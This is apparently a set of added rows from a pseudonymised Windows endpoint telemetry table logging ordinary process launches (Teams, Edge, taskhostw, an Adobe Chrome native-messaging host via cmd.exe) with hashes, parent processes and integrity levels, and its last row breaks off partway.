+481,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:13:17.621278700+00:00,16736,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:13:17.673216400+00:00,2021-06-24 11:14:35.051897700+00:00,5c647c60-5af5-460b-9590-9a0edc028121,computerpii_0a470890c60768167990033d701e7bd881398861,180070,False,10.7740.19041.1052,False,11540474045177893,,11540474045177986,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+482,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:14:24.559540900+00:00,20140,taskhostw.exe,taskhostw.exe -RegisterUserDevice -NewAccount,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:14:24.609071400+00:00,2021-06-24 11:14:35.052057700+00:00,350cb369-1a37-4c62-8dc4-bc55c3d19384,computerpii_0a470890c60768167990033d701e7bd881398861,180072,False,10.7740.19041.1052,False,11540474045136925,,11540474045177988,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465521635,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+483,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:14:24.635158300+00:00,9408,taskhostw.exe,taskhostw.exe -RegisterDevice -AccountChange,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:14:25.476099500+00:00,2021-06-24 11:14:35.052217300+00:00,a9ad5750-1204-4958-a341-278a38abea95,computerpii_0a470890c60768167990033d701e7bd881398861,180074,False,10.7740.19041.1052,False,11540474045136925,,11540474045177989,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+484,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:23.380967500+00:00,17048,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:23.450141700+00:00,2021-06-24 00:53:50.918421100+00:00,86b5bbb7-4c01-440e-88b9-b4865bfb5140,computerpii_0a470890c60768167990033d701e7bd881398861,168074,False,10.7740.19041.1052,False,11540474045175158,,11540474045175180,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+485,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:23.743103200+00:00,14328,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.590ea6a92fe69969 > \\.\pipe\chrome.nativeMessaging.out.590ea6a92fe69969",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:23.926427700+00:00,2021-06-24 00:53:50.918948200+00:00,8f69f9c2-499f-4763-8a12-10bed26decf7,computerpii_0a470890c60768167990033d701e7bd881398861,168084,False,10.7740.19041.1052,False,11540474045175164,,11540474045175182,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,2176,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,0.0,1.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+486,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:23.789420200+00:00,11332,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:23.743103200+00:00,14328,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.590ea6a92fe69969 > \\.\pipe\chrome.nativeMessaging.out.590ea6a92fe69969",False,2021-06-24 00:52:21.237057100+00:00,18968,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:23.933091900+00:00,2021-06-24 00:53:50.919162400+00:00,5b700002-378b-48ff-a49f-76728a516055,computerpii_0a470890c60768167990033d701e7bd881398861,168088,False,10.7740.19041.1052,False,11540474045175182,,11540474045175183,2021-06-24 00:52:23.743103200+00:00,14328,2021-06-24 00:52:23.743103200+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,14328,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 00:52:23.836202300+00:00,2021-02-17 04:34:58.875918800+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+487,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:23.974743200+00:00,16636,WCChromeNativeMessagingHost.exe,"""WCChromeNativeMessagingHost.exe""  chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 ",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe,171232,4b700f688d0bf07dc2f7cfc658378a01,f2399c9999ba49e7952598df3f95d3854ee69357cc9073b5e54c63a5f7861862,990df54a9fd6c438d31522aecefc71ea0f04f869,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:23.743103200+00:00,14328,cmd.exe,"cmd.exe /d /c ""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe"" chrome-extension://efaidnbmnnnibpcajpcglclefindmkaj/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.590ea6a92fe69969 > \\.\pipe\chrome.nativeMessaging.out.590ea6a92fe69969",False,2021-06-24 00:52:21.237057100+00:00,18968,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:23.987362+00:00,2021-06-24 00:53:50.919265900+00:00,f161f5da-c02c-4217-9e04-0075ad135bdc,computerpii_0a470890c60768167990033d701e7bd881398861,168090,False,10.7740.19041.1052,False,11540474045175182,,11540474045175184,2021-06-24 00:52:23.743103200+00:00,14328,2021-06-24 00:52:23.743103200+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,14328,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 00:52:23.836202300+00:00,2021-02-17 04:34:58.875918800+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Adobe Systems Inc.,Adobe Create PDF,21.5.20048.436468,,WCChromeNativeMessagingHost.exe,Adobe Create PDF plug-in listener for Chrome
+488,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:25.066889600+00:00,20164,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:25.173060500+00:00,2021-06-24 00:53:50.920837700+00:00,f87cf6b3-37ed-4f91-b62d-bd45db9fd48f,computerpii_0a470890c60768167990033d701e7bd881398861,168121,False,10.7740.19041.1052,False,11540474045175158,,11540474045175187,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+489,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:25.129725800+00:00,19256,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:25.238596500+00:00,2021-06-24 00:53:50.920886300+00:00,822dc6bc-d668-48be-8131-1e8832f4487f,computerpii_0a470890c60768167990033d701e7bd881398861,168122,False,10.7740.19041.1052,False,11540474045175158,,11540474045175189,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+490,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:25.241489400+00:00,15908,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:25.344173200+00:00,2021-06-24 00:53:50.920938100+00:00,ccf8b8b4-b8e4-4f71-b2ac-873ec2a4fd1a,computerpii_0a470890c60768167990033d701e7bd881398861,168123,False,10.7740.19041.1052,False,11540474045175158,,11540474045175190,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 